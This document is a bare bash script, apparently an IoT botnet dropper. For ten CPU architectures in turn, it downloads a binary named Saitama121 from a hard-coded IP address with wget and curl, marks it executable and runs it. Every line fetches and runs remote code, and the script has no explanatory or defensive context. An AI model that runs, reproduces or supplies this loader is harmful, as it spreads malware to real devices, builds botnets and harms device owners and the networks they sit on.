#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.x86; curl -O http://136.144.41.55/bins/Saitama121.x86;cat Saitama121.x86 >cp;chmod +x *;./cp x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.mips; curl -O http://136.144.41.55/bins/Saitama121.mips;cat Saitama121.mips >cp;chmod +x *;./cp mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.mpsl; curl -O http://136.144.41.55/bins/Saitama121.mpsl;cat Saitama121.mpsl >cp;chmod +x *;./cp mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.arm; curl -O http://136.144.41.55/bins/Saitama121.arm;cat Saitama121.arm >cp;chmod +x *;./cp arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.arm5; curl -O http://136.144.41.55/bins/Saitama121.arm5;cat Saitama121.arm5 >cp;chmod +x *;./cp arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.arm6; curl -O http://136.144.41.55/bins/Saitama121.arm6;cat Saitama121.arm6 >cp;chmod +x *;./cp arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.arm7; curl -O http://136.144.41.55/bins/Saitama121.arm7;cat Saitama121.arm7 >cp;chmod +x *;./cp arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.ppc; curl -O http://136.144.41.55/bins/Saitama121.ppc;cat Saitama121.ppc >cp;chmod +x *;./cp ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.m68k; curl -O http://136.144.41.55/bins/Saitama121.m68k;cat Saitama121.m68k >cp;chmod +x *;./cp m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://136.144.41.55/bins/Saitama121.sh4; curl -O http://136.144.41.55/bins/Saitama121.sh4;cat Saitama121.sh4 >cp;chmod +x *;./cp sh4
